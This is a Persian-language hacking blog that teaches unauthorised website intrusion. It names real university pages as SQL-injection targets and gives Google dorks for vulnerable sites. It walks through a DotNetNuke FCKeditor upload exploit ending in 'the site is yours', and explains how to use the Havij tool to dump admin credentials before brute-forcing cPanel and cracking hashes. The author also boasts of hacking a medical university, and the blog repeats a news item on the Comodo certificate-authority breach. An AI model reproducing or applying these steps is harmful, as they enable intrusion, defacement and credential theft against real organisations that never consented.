هک و امنیت

تارگت

دانشگاه لندن انگلیس

http://external.shl.london.ac.uk/res/databases.asp?id=Law%27

دانشگاه آکسفورد

www.chem.ox.ac.uk/oxfordtour/tutorial/index.asp?ID=42
http://www.politics.ox.ac.uk/research/projects/project_summary.asp?id=121%27

پرینستون امریکا (دانشگاه انیشتین)

http://opr.princeton.edu/faculty/page.asp?id=singer%27

نوشته شده در تاريخ ۱۳٩٠/٢/۱ توسط خان امیری

نظرات ()

هک سایت با باگ DNN

هر چند یه باگ قدیمی هست ولی خوب هنوزم به کار میاد.

ابتدا دو دارک برای این کار معرفی میکنم.

کد:

inurl:/tabid/36/language/en-US/Default.aspx

و همچنین این دورک

شما کافیه یکی از این دو دارک (درک) رو تو گوگل جستجوکنید . سایت هایی که میاد رو باز کنید و به ادرس سایت عبارت زیر رو اضافه کنید

کد:

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

یعنی ادرس شما باید یه چیزی مثل این بشه :

کد:

Sait.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

حالا اینتر رو بزنید و صبر کنید تا صفحه لود بشه . اگه صفحه این شکلی بود که باید بیخیال این سایت بشید و برید سراغ سایت بعدی .

Link Galery

Use the select

ولی اگر صفحه ای مانند شکل زیر باز شد

قسمت سوم یعنی

کد:

File ( A File On Your Site )

رو انتخاب کنید تا صفحه رفرش شود. بعد از اینکه صفحه رفرش شد کد زیر را به جای ادرس در ادرس بار مرورگرتان وارد کنید

دقت کنید آدرس قبلی را پاک کنید و این عبارت را به جای آن وارد کنید

کد:

javascript:__doPostBack('ctlURL$cmdUpload','')

صفحه رفرش شد

سایت در اختیار شماست

نوشته شده در تاريخ ۱۳٩٠/۱/۳۱ توسط خان امیری

نظرات ()

Dork & Bug

تعریف:

باگ: باگ به زبان ساده یعنی حفره...

دورک:یسری کد که ما به گوگل میدیم تا ساتهای که نفوذ پذیرن رو واسمون دسته بندی کنه

باگ DNN این یکی از قدیمی ترین باگهاست ولی هنوز هم جواب میده ....

با این باگ شما میتونید به قسمت اپلود تارگتتون دست پیدا کنید و هر فایلی که خواستید رویه سایت اپلود کنید...

دورک این باگ:

inurl:tabid/130/default.aspx inurl:.net
*******************************
inurl:"providers/HtmlEditorProviders"
********************************
inurl:tabid/162/Default.aspx
*******************************
inurl:tabid/162/Default.aspx
****************************
.gov"inurl:tabid 555 Default aspx"
*******************************
co.us "inurl:tabid 160 Default aspx"
*******************************
"inurl:tabid 160 Default aspx"

*******************************

2==> باگ NUK این باگ هم نسبتا قدیمی هست ولی بازم میشه کاریش کرد..

دورک: این باگ

modules.php?name=Sections" site:.com

3==> باگ xss اینم یه باگ که در خیلی از تارگت ها وجود داره و در این باگ شما با یسری کد جاوا میتونید باعث تغییرات بشید در تارگتتون.
4==> باگ rce با کمک این باگ در تارگتتون میتونید شل آپلود کنید...
5==> باگ cmsf این باگ هم دسترسی به اپلودر سایت خواهید داشت...
دورک: inurl:Sitefinity: Login
6==> باگ lfi ... خیلی کارها از جمله شل میشه باهاش ریخت..
7==> باگ rfu این باگ هم دسترسی به آپلودر تارگت خواهی داشت...

دورک :

editor/filemanager/connectors/php/userfiles/

8 ==> باگ cgi : این باگ جالبه چون با دستورات که در لینوکس یا دستوراتی که در شل کاربرد داره میشه اطلاعات سایت رو بیرون بکشیم.. حتی تمام یوزرها جالب اینه بدون استفاده از آپلود شل ...

دورک:

inurl:/cgi-bin/technote

8==> باگ CSRF که ماجرا داره....
9==> باگ مورد علاقه من ویمبلتون vib که همه کار باهاش میشه کرد از دیفیس تا آپلود شل تا دسرسی به cpanel
10==> باگ معروف sql واجبه یه هکر یادش بگیره ...
البته یه سری روش ها تلفیقی هست مثلا تلفیق روش sql با xss که جالبه....
اینم از دسته بندی باگها ...البته میگم که اینها همه باگها نیست مثلا باگهای وردپرس و چند تای دیگه...

ادامه مطلب

نوشته شده در تاريخ ۱۳٩٠/۱/۳۱ توسط خان امیری

نظرات ()

اخبار دنیای هک

بعد از مدت بسیار طولانی سلام!!!!

با یه خبر جالب و خوندنی آپ میکنیم...راسی از این به بعد میخایم بریم تو کار شل و دیفیس پیج / امیدوارم فیل *** تر نشیم نیشخند عینک

به گزارش گرداب، طی روزهای گذشته خبری منتشر شد مبنی بر اینکه پایگاه داده یکی از تاییدکننده های تبادلات امن در اینترنت موسوم به CA هک شده است.

این هک پر سر و صدا، بلافاصله به حکومت ایران منتسب شد و رسانه‌های غربی جنجال زیادی را در این مورد به راه انداختند.

اما هکر این سایت با انتشار متنی در اینترنت و با ارائه مستندات قطعی فنی مبنی بر اینکه هک از طرف او انجام شده است انگیزه خود از این اقدام را توضیح داد.

اگر چه کارشناسان امنیت شبکه در مورد چنین ادعاهایی بسیار محتاط هستند و به راحتی آن را نمی پذیرند‌، با این وجود اعلام کرده‌اند که جزئیات کدهایی که این هکر اعلام کرده درست و قابل قبول است.

مارکو هایپونن، رئیس تیم تحقیقاتی شرکت "اف – سکیور" در فنلاند در این باره گفته است که این هکر به کدهایی از سیستم‌های داخلی کومودو دسترسی داشته است‌. اما در مورد اینکه بقیه ادعاهای وی درست است یا نه ، اطلاعاتی در دست نداریم.

این هکر ایرانی با بیان اینکه با توانایی و دانش شخصی خود به صورت مستقل به این اقدام دست زده است، توضیح داد: «چه طور است که در جریان انتشار ویروس استاکس نت هیچ گونه واکنش انتقادی نسبت به این موضوع نشان داده نشد و حتی صاحبان شرکت های فنی غربی با هماهنگی انجام شده بیش از دو سال پچ کاری باگ پرینتر استفاده شده در استاکس نت را به تاخیر انداختند، اما در جریان هک کومودو، کار به اینجا رسیده که حتی خبرنگاری از سفیر ایران در سازمان ملل در مورد این اقدام سوال کرده است.»

هکر کومودو این سوال را طرح کرد که چه طور وقتی ویروس استاکس نت با صرف بودجه میلیون دلاری و با دسترسی به انواع سیستم های اسکادا از سوی امریکا و اسرائیل ساخته شد، کسی از سفیر آنها در سازمان ملل سوال نکرد؟

این هکر همچنین پرسید: «چه طور است که دولت های غربی می توانند با تکیه بر انواع و اقسام سیستم‌های شنود ارتباطی همانند اشلون، ارتباطات اینترنتی اعم از جی‌میل، اسکایپ و‌... را شنود کنند و صدا از کسی در نیاید اما هک وی این گونه مورد انتقاد قرار گرفته است؟»

هکر 21 ساله کومودو در پایان پیام مفصل خود به فارسی گفته است:

«جانم فدای رهبر.»

البته این متن اصلی رو بخونید نظر برعکسه !!!!

http://pastebin.com/CvGXyfiJ

نوشته شده در تاريخ ۱۳٩٠/۱/۱٤ توسط خان امیری

نظرات ()

***عید همتون مبارک***

نوشته شده در تاريخ ۱۳۸٩/۱٢/٢٩ توسط خان امیری

نظرات ()

دروود

سلام

فقط اومدم بگم (عذر تقصیر) چند وقته نتونستم بیام نت سرم شلوغه...کودک خواهرم دنیا اومده و همه خوشحالیم

شاعر میگه: همه چی ارومه من چقدر خوشحالم...

تقریبا میتونم اسم خودم رو بزارم پرستار بچه...شغل خوبیه...امیدوارم دچارش بشین...که خیلی خوبه....حالا عکسشو میزارم...هرچند اینجا وبلاگ هک و امنیته و ربطی نداره

دوستان عزیز در نیمه راه هک دانشگاه علوم پزشکی قم بودم (که خیلی خز میباشد) که ناگهان که نه , با اطلاع قبلی خاله شدم ...حالا میام و ادامه اموزش هارو هم میدم...این دفعه تصویری...فقط یکی لطف کنه یه اپلود سنتر باحال با ظرفیت بالا معرفی کنه...ممنون از همه

نوشته شده در تاريخ ۱۳۸٩/۱٢/٢٥ توسط خان امیری

نظرات ()

ادامه ی اموزش هویج و پایان

گزینه های 1 & 2

را کلیک کنید Analyze وارد کنید و Target آدرس صفحه ی آسیب پذیر را در قسمت برنامه شروع به انالیز میکنه و بعد مدت کوتاهی در صورتی که مشکلی پیش نیاد گزینه های 3 & 4 & 5 & 6 روشن میشوند و شما میتوانید تمامی جداول و دیتابیس های هدف رو مشاهده کنید

شما میتوانید با استفاده از گزینه های save & load مراحل مورد نظر را ذخیره کنید تا اگر وقت نکردید

کار رو تموم کنید دفعه ی بعد از ابتدا شروع به انالیز نکنید و از گزینه ی load استفاده کنید

گزینه 3

با استفاده از این گزینه میتونیم اطلاعاتی از قبیل ورژن سرور دیتا بیس و نام کاربری و ...رو ببینیم

گزینه 4

بااستفاده از گزینه ی table شما میتونید اطلاعات جدول و ستون های جول رو بگیرید البته با استفاده

وقتی که گزینه ی table رو میزنید صفحه ی جدید دارای یه گزینه میباشد که باید اونو تیک بزنید

و بعد گزینه ی Get Table رو بزنید و بعد

سپس مثل قبل مربع های کوچک دیگری پیدا میشود که شما میتونید اونارو تیک زده و برای دریافت اطلاعات داخل انها از گزینه ی Get Datat استفاده میکنید تا اطلاعات رو دریافت کنید ...حالا اطلاعات مهمی که ما احتیاج داریم یوزر و پسوورد ادمین سایت هستش که با یکم جستجو بین گزینه ها پیداش میکنید و باید به نام گزینه ها در این کار دقت کنید

بعد از این کار میتونیم از یوزر در نفوذ به صفحه cpanel سایت استفاده کنیم و برای این کار باید صفحه ادمین رو پیدا کنیم که گزینه ی 5 میباشد

گزینه ی5

حالا در اینجا ادرس سایت رو وارد میکنیم و منتظر میشیم تا Cpanel رو برامون پیدا کنه

بعد از اون دیگه مثل باقلوا یوزر رو وارد میکنیم ولی پسوورد نداریم که ؟!!! ;))

حالا باید از نرم افزار bruteforcercpanel استفاده کنید تا یتونین پسوورد ادمین رو کرک کنید

گزینه ی 6:

با استفاده از گزینه ی MD5 میتونید در همون قسمتی که یوزر و پسوورد ادمین رو دراوردین به وسیله ی این گزینه پسوورد رو هش کنید ولی باید بگم این پسوورد ربطی به پسوورد Cpanel نداره و مربوط به پسوورد سایت هستش نه پسوورد ادمین ....و به وسیله ی MD5 این پسوورد رو " هش "میکنید و بعد به وسیله ی نرم افزار Cain اون رو کرک میکنید و به پعد رمز تبدیل میشه که من نمیدونم موارد استفاده ی این رمز چیه...

The End

یه فیلم اموزشی خوب هم دارم که کار دوست خویم Easy_Easy که براتوم میزارم تا حالشو ببرین ولی الان نمیتونم چون سرعتم پایینه... :(

نوشته شده در تاريخ ۱۳۸٩/۱٠/٢٠ توسط خان امیری

نظرات ()

اموزش هویج

خوب به نظرم دیگه بیخیال NC بشیم بهتره LOL... یعنی اینکه اموزش تموم شده و با کمی تمرین دیگه مشکلی نیست

این هفته میخام اموزش نرم افزار هویج رو بزارم

حالا اصلا این نرم افزار هویج چیه و کاربردش :

در طراحی سایت ها معمولا از دیتا بیس هاییی استفاده میشه که برای نگهداری اطلاعات هستش و ادمین سایت اون رو طبقه بندی و مرتب میکنه!!

این دیتابیس ها بر پایه SQL هستن و زبان برنامه نویسیشون SQL میباشد
حالا نکته اینکه گاهی در این دیتابیس های SQL باگ هایی پیدا میشه که که هکر میتونه با استفاده از این باگ یا حفره امنیتی به دیتابیس نفوذ کنه و کارهای مورد نظرش رو انجام بده....

یکی از روش ها برای شناسایی این باگ ها استفاده از دستورات SQL
در قسمت ادرس بار سایت هستش که با توجه به ERORR ای که میده میشه فهمید که قابل نفوذذ هست یا نه...حالا برای اینکه از این دستورات استفاده کنید باید با زبان SQL اشنایی داشته باشید

اول از همه برای اینکه متوجه بشیم باگ وجود داره یا نه میتونیم ار پارامتر هایی مثل ' و " و $$$ ... etc استفاده کنیم

این دستورات میشه در قسمت sername & password و ادرس بار وارد بشن

نوشته شده در تاريخ ۱۳۸٩/۱٠/۱۱ توسط خان امیری

نظرات ()

هک و امنیت صفحه اول آرشيو مطالب تماس با ما قالب وبلاگ گلچین قالب RSS 2.0
نويسندگان خان امیری پيوند ها گالری عکس برنامه ی 90 علی ولی الله دانلود نرم افزار روزنامه دنیای فوتبال $ میعادگاه بیکران $ تراکتور سازی اذربایجان سایت رسمی پرسپولیس سایت تخصصی کامپیوتر و موبایل نوشته های مادری برای کودکش بازی آنلاین فلش گیم اینترنتی وبلاگ دانشجویان علو اب (طنز)86 دهکده زرین جویای حقیقت دریاچه ی قو خاطرات روزانه خزوخیل یادداشت های یک خبرنگار این کوله پشتی من است * دیکشنری انلاین * ....old love.... شکلات قالب وبلاگ گلچین قالب های وبلاگ <' -------------------------------------------- -------------------------------------------- --------------------------------------------	تارگت دانشگاه لندن انگلیس http://external.shl.london.ac.uk/res/databases.asp?id=Law%27 دانشگاه آکسفورد www.chem.ox.ac.uk/oxfordtour/tutorial/index.asp?ID=42 http://www.politics.ox.ac.uk/research/projects/project_summary.asp?id=121%27 پرینستون امریکا (دانشگاه انیشتین) http://opr.princeton.edu/faculty/page.asp?id=singer%27 نوشته شده در تاريخ ۱۳٩٠/٢/۱ توسط خان امیری نظرات () هک سایت با باگ DNN هر چند یه باگ قدیمی هست ولی خوب هنوزم به کار میاد. ابتدا دو دارک برای این کار معرفی میکنم. کد: inurl:/tabid/36/language/en-US/Default.aspx و همچنین این دورک شما کافیه یکی از این دو دارک (درک) رو تو گوگل جستجوکنید . سایت هایی که میاد رو باز کنید و به ادرس سایت عبارت زیر رو اضافه کنید کد: /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx یعنی ادرس شما باید یه چیزی مثل این بشه : کد: Sait.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx حالا اینتر رو بزنید و صبر کنید تا صفحه لود بشه . اگه صفحه این شکلی بود که باید بیخیال این سایت بشید و برید سراغ سایت بعدی . Link Galery Use the select ولی اگر صفحه ای مانند شکل زیر باز شد قسمت سوم یعنی کد: File ( A File On Your Site ) رو انتخاب کنید تا صفحه رفرش شود. بعد از اینکه صفحه رفرش شد کد زیر را به جای ادرس در ادرس بار مرورگرتان وارد کنید دقت کنید آدرس قبلی را پاک کنید و این عبارت را به جای آن وارد کنید کد: javascript:__doPostBack('ctlURL$cmdUpload','') صفحه رفرش شد سایت در اختیار شماست نوشته شده در تاريخ ۱۳٩٠/۱/۳۱ توسط خان امیری نظرات () Dork & Bug تعریف: باگ: باگ به زبان ساده یعنی حفره... دورک:یسری کد که ما به گوگل میدیم تا ساتهای که نفوذ پذیرن رو واسمون دسته بندی کنه باگ DNN این یکی از قدیمی ترین باگهاست ولی هنوز هم جواب میده .... با این باگ شما میتونید به قسمت اپلود تارگتتون دست پیدا کنید و هر فایلی که خواستید رویه سایت اپلود کنید... دورک این باگ: inurl:tabid/130/default.aspx inurl:.net ***************************** inurl:"providers/HtmlEditorProviders" **************************** inurl:tabid/162/Default.aspx *************************** inurl:tabid/162/Default.aspx ************************ .gov"inurl:tabid 555 Default aspx" *************************** co.us "inurl:tabid 160 Default aspx" *************************** "inurl:tabid 160 Default aspx" *************************** 2==> باگ NUK این باگ هم نسبتا قدیمی هست ولی بازم میشه کاریش کرد.. دورک: این باگ modules.php?name=Sections" site:.com 3==> باگ xss اینم یه باگ که در خیلی از تارگت ها وجود داره و در این باگ شما با یسری کد جاوا میتونید باعث تغییرات بشید در تارگتتون. 4==> باگ rce با کمک این باگ در تارگتتون میتونید شل آپلود کنید... 5==> باگ cmsf این باگ هم دسترسی به اپلودر سایت خواهید داشت... دورک: inurl:Sitefinity: Login 6==> باگ lfi ... خیلی کارها از جمله شل میشه باهاش ریخت.. 7==> باگ rfu این باگ هم دسترسی به آپلودر تارگت خواهی داشت... دورک : editor/filemanager/connectors/php/userfiles/ 8 ==> باگ cgi : این باگ جالبه چون با دستورات که در لینوکس یا دستوراتی که در شل کاربرد داره میشه اطلاعات سایت رو بیرون بکشیم.. حتی تمام یوزرها جالب اینه بدون استفاده از آپلود شل ... دورک: inurl:/cgi-bin/technote 8==> باگ CSRF که ماجرا داره.... 9==> باگ مورد علاقه من ویمبلتون vib که همه کار باهاش میشه کرد از دیفیس تا آپلود شل تا دسرسی به cpanel 10==> باگ معروف sql واجبه یه هکر یادش بگیره ... البته یه سری روش ها تلفیقی هست مثلا تلفیق روش sql با xss که جالبه.... اینم از دسته بندی باگها ...البته میگم که اینها همه باگها نیست مثلا باگهای وردپرس و چند تای دیگه... ادامه مطلب نوشته شده در تاريخ ۱۳٩٠/۱/۳۱ توسط خان امیری نظرات () اخبار دنیای هک بعد از مدت بسیار طولانی سلام!!!! با یه خبر جالب و خوندنی آپ میکنیم...راسی از این به بعد میخایم بریم تو کار شل و دیفیس پیج / امیدوارم فیل * تر نشیم به گزارش گرداب، طی روزهای گذشته خبری منتشر شد مبنی بر اینکه پایگاه داده یکی از تاییدکننده های تبادلات امن در اینترنت موسوم به CA هک شده است. این هک پر سر و صدا، بلافاصله به حکومت ایران منتسب شد و رسانه‌های غربی جنجال زیادی را در این مورد به راه انداختند. اما هکر این سایت با انتشار متنی در اینترنت و با ارائه مستندات قطعی فنی مبنی بر اینکه هک از طرف او انجام شده است انگیزه خود از این اقدام را توضیح داد. اگر چه کارشناسان امنیت شبکه در مورد چنین ادعاهایی بسیار محتاط هستند و به راحتی آن را نمی پذیرند‌، با این وجود اعلام کرده‌اند که جزئیات کدهایی که این هکر اعلام کرده درست و قابل قبول است. مارکو هایپونن، رئیس تیم تحقیقاتی شرکت "اف – سکیور" در فنلاند در این باره گفته است که این هکر به کدهایی از سیستم‌های داخلی کومودو دسترسی داشته است‌. اما در مورد اینکه بقیه ادعاهای وی درست است یا نه ، اطلاعاتی در دست نداریم. این هکر ایرانی با بیان اینکه با توانایی و دانش شخصی خود به صورت مستقل به این اقدام دست زده است، توضیح داد: «چه طور است که در جریان انتشار ویروس استاکس نت هیچ گونه واکنش انتقادی نسبت به این موضوع نشان داده نشد و حتی صاحبان شرکت های فنی غربی با هماهنگی انجام شده بیش از دو سال پچ کاری باگ پرینتر استفاده شده در استاکس نت را به تاخیر انداختند، اما در جریان هک کومودو، کار به اینجا رسیده که حتی خبرنگاری از سفیر ایران در سازمان ملل در مورد این اقدام سوال کرده است.» هکر کومودو این سوال را طرح کرد که چه طور وقتی ویروس استاکس نت با صرف بودجه میلیون دلاری و با دسترسی به انواع سیستم های اسکادا از سوی امریکا و اسرائیل ساخته شد، کسی از سفیر آنها در سازمان ملل سوال نکرد؟ این هکر همچنین پرسید: «چه طور است که دولت های غربی می توانند با تکیه بر انواع و اقسام سیستم‌های شنود ارتباطی همانند اشلون، ارتباطات اینترنتی اعم از جی‌میل، اسکایپ و‌... را شنود کنند و صدا از کسی در نیاید اما هک وی این گونه مورد انتقاد قرار گرفته است؟» هکر 21 ساله کومودو در پایان پیام مفصل خود به فارسی گفته است: «جانم فدای رهبر.» البته این متن اصلی رو بخونید نظر برعکسه !!!! http://pastebin.com/CvGXyfiJ نوشته شده در تاريخ ۱۳٩٠/۱/۱٤ توسط خان امیری نظرات () *عید همتون مبارک* نوشته شده در تاريخ ۱۳۸٩/۱٢/٢٩ توسط خان امیری نظرات () دروود سلام فقط اومدم بگم (عذر تقصیر) چند وقته نتونستم بیام نت سرم شلوغه...کودک خواهرم دنیا اومده و همه خوشحالیم شاعر میگه: همه چی ارومه من چقدر خوشحالم... تقریبا میتونم اسم خودم رو بزارم پرستار بچه...شغل خوبیه...امیدوارم دچارش بشین...که خیلی خوبه....حالا عکسشو میزارم...هرچند اینجا وبلاگ هک و امنیته و ربطی نداره دوستان عزیز در نیمه راه هک دانشگاه علوم پزشکی قم بودم (که خیلی خز میباشد) که ناگهان که نه , با اطلاع قبلی خاله شدم ...حالا میام و ادامه اموزش هارو هم میدم...این دفعه تصویری...فقط یکی لطف کنه یه اپلود سنتر باحال با ظرفیت بالا معرفی کنه...ممنون از همه نوشته شده در تاريخ ۱۳۸٩/۱٢/٢٥ توسط خان امیری نظرات () ادامه ی اموزش هویج و پایان گزینه های 1 & 2 را کلیک کنید Analyze وارد کنید و Target آدرس صفحه ی آسیب پذیر را در قسمت برنامه شروع به انالیز میکنه و بعد مدت کوتاهی در صورتی که مشکلی پیش نیاد گزینه های 3 & 4 & 5 & 6 روشن میشوند و شما میتوانید تمامی جداول و دیتابیس های هدف رو مشاهده کنید شما میتوانید با استفاده از گزینه های save & load مراحل مورد نظر را ذخیره کنید تا اگر وقت نکردید کار رو تموم کنید دفعه ی بعد از ابتدا شروع به انالیز نکنید و از گزینه ی load استفاده کنید گزینه 3 با استفاده از این گزینه میتونیم اطلاعاتی از قبیل ورژن سرور دیتا بیس و نام کاربری و ...رو ببینیم گزینه 4 بااستفاده از گزینه ی table شما میتونید اطلاعات جدول و ستون های جول رو بگیرید البته با استفاده وقتی که گزینه ی table رو میزنید صفحه ی جدید دارای یه گزینه میباشد که باید اونو تیک بزنید و بعد گزینه ی Get Table رو بزنید و بعد سپس مثل قبل مربع های کوچک دیگری پیدا میشود که شما میتونید اونارو تیک زده و برای دریافت اطلاعات داخل انها از گزینه ی Get Datat استفاده میکنید تا اطلاعات رو دریافت کنید ...حالا اطلاعات مهمی که ما احتیاج داریم یوزر و پسوورد ادمین سایت هستش که با یکم جستجو بین گزینه ها پیداش میکنید و باید به نام گزینه ها در این کار دقت کنید بعد از این کار میتونیم از یوزر در نفوذ به صفحه cpanel سایت استفاده کنیم و برای این کار باید صفحه ادمین رو پیدا کنیم که گزینه ی 5 میباشد گزینه ی5 حالا در اینجا ادرس سایت رو وارد میکنیم و منتظر میشیم تا Cpanel رو برامون پیدا کنه بعد از اون دیگه مثل باقلوا یوزر رو وارد میکنیم ولی پسوورد نداریم که ؟!!! ;)) حالا باید از نرم افزار bruteforcercpanel استفاده کنید تا یتونین پسوورد ادمین رو کرک کنید گزینه ی 6: با استفاده از گزینه ی MD5 میتونید در همون قسمتی که یوزر و پسوورد ادمین رو دراوردین به وسیله ی این گزینه پسوورد رو هش کنید ولی باید بگم این پسوورد ربطی به پسوورد Cpanel نداره و مربوط به پسوورد سایت هستش نه پسوورد ادمین ....و به وسیله ی MD5 این پسوورد رو " هش "میکنید و بعد به وسیله ی نرم افزار Cain اون رو کرک میکنید و به پعد رمز تبدیل میشه که من نمیدونم موارد استفاده ی این رمز چیه... The End یه فیلم اموزشی خوب هم دارم که کار دوست خویم Easy_Easy که براتوم میزارم تا حالشو ببرین ولی الان نمیتونم چون سرعتم پایینه... :( نوشته شده در تاريخ ۱۳۸٩/۱٠/٢٠ توسط خان امیری نظرات () اموزش هویج خوب به نظرم دیگه بیخیال NC بشیم بهتره LOL... یعنی اینکه اموزش تموم شده و با کمی تمرین دیگه مشکلی نیست این هفته میخام اموزش نرم افزار هویج رو بزارم حالا اصلا این نرم افزار هویج چیه و کاربردش : در طراحی سایت ها معمولا از دیتا بیس هاییی استفاده میشه که برای نگهداری اطلاعات هستش و ادمین سایت اون رو طبقه بندی و مرتب میکنه!! این دیتابیس ها بر پایه SQL هستن و زبان برنامه نویسیشون SQL میباشد حالا نکته اینکه گاهی در این دیتابیس های SQL باگ هایی پیدا میشه که که هکر میتونه با استفاده از این باگ یا حفره امنیتی به دیتابیس نفوذ کنه و کارهای مورد نظرش رو انجام بده.... یکی از روش ها برای شناسایی این باگ ها استفاده از دستورات SQL در قسمت ادرس بار سایت هستش که با توجه به ERORR ای که میده میشه فهمید که قابل نفوذذ هست یا نه...حالا برای اینکه از این دستورات استفاده کنید باید با زبان SQL اشنایی داشته باشید اول از همه برای اینکه متوجه بشیم باگ وجود داره یا نه میتونیم ار پارامتر هایی مثل ' و " و $$$ ... etc استفاده کنیم این دستورات میشه در قسمت sername & password و ادرس بار وارد بشن نوشته شده در تاريخ ۱۳۸٩/۱٠/۱۱ توسط خان امیری نظرات ()	درباره وبلاگ آرشيو مطالب فروردین ٩٠ اسفند ۸٩ دی ۸٩ آذر ۸٩ آبان ۸٩ مهر ۸٩ شهریور ۸٩ آخرين مطالب تارگت هک سایت با باگ DNN Dork & Bug اخبار دنیای هک ۱۳۸٩/۱٢/٢٩ دروود ادامه ی اموزش هویج و پایان اموزش هویج تبریک ادامه ی NC موضوعات تارگت خارجی (٢) باگ dnn (٢) اموزش باگ (٢) تارگت sql i (۱) هک سایت باگ dnn (۱) target (۱) شل (۱) دانلود netcat (۱) pdf اموزش netcat یا nc (۱) نرم افزار nc دانلود رایگان (۱) اموزش netcat (۱) اموزش telnet (۱) هکر های معروف دنیا (۱) دانلود نرم افزار putty (۱) اموزش هک و تلنت و netcat (۱) nc نرم افزار اموزش nc (۱) اموزش پایه هک مبتدیان هک هکر های تازه وارد (۱) اموزش نتکت nc (۱) اموزش گام به گام هک با nc (۱) تارگت برای تمرین (۱)
تمامی حقوق این وبلاگ محفوظ است \| طراحی : پیچک